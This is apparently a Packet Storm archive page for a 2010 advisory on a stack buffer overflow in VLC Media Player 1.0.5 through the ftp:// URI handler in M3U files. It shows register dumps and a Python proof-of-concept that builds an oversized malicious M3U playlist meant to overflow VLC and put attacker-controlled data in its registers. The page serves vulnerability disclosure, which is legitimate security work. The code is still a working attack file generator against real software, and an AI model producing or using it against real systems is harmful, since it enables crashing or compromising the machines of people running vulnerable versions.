exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VLC Media Player 1.0.5 (Goldeneye) Buffer Overflow

VLC Media Player 1.0.5 (Goldeneye) Buffer Overflow
Posted Jul 7, 2010
Authored by Praveen Darshanam

VLC Media Player version 1.0.5 (Goldeneye) suffers from a remote URI handler stack buffer overflow vulnerability.

tags | exploit, remote, overflow
SHA-256 | c3909901a0404e981f7a24029eec3b4c3cd4fbc194372078edd7d57d92d2d2fc

VLC Media Player 1.0.5 (Goldeneye) Buffer Overflow

Change Mirror Download
There a Vulnerability in VLC Media Player v1.0.5 (Goldeneye) when handling M3U files with ftp:// URI handler.

When we open the malicious file our EDX and EBP registers point to the user supplied data which might lead to code execution.
State of the registers when we opne the malicious file is:

EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0 ES 0023 32bit 0(FFFFFFFF)


Attaching image for above stack trace and PoC script.

#############START PYTHON########################
import sys
import string

print "\n\n***VLC Player M3U file ftp:// URI Handler Remote Stack Buffer Overflow***\n"

#Tested on Microsoft Windows XP Professional SP3
# Application Vulnerable: VLC Media Player v1.0.5 (Goldeneye)
# Not Vulnerable: VLC Media Player v1.1.0 (The Luggage), Checked on windows 7

#edx register points to our data afetr 4255 bytes
buf1 = "ftp://" + "PRAV" + "\x44" * 4251
buf2 = buf1 + "A" * 4
buf3 = buf2 + "Z" * (100000-4259)

print "100000-4259 is: ", 100000-4259
print "Creating malicious M3U file . . .\n"

filem3u=open('m3uftp.m3u','w')
filem3u.write(buf3)
filem3u.close()

print "Created M3U file. Open with VLC Media Player v1.0.5 (Goldeneye)\n\n"



'''
EAX 00000000
ECX 7008A2B7 ASCII ";type="
EDX 01DC743B ASCII "ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
EBX 01C8C120
ESP 0324FB78
EBP 01D19008 ASCII "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
ESI 00000000
EDI 00000000
EIP 77C47C7E msvcrt.77C47C7E
C 0 ES 0023 32bit 0(FFFFFFFF)


'''
#Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)
# Praveen Darshanam
#############END PYTHON###########################
Hi to all Indian Hacker$, Andhra/ Telangana Hacker$ ;)

Best Regards,
Praveen Darshanam,
Security Researcher
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close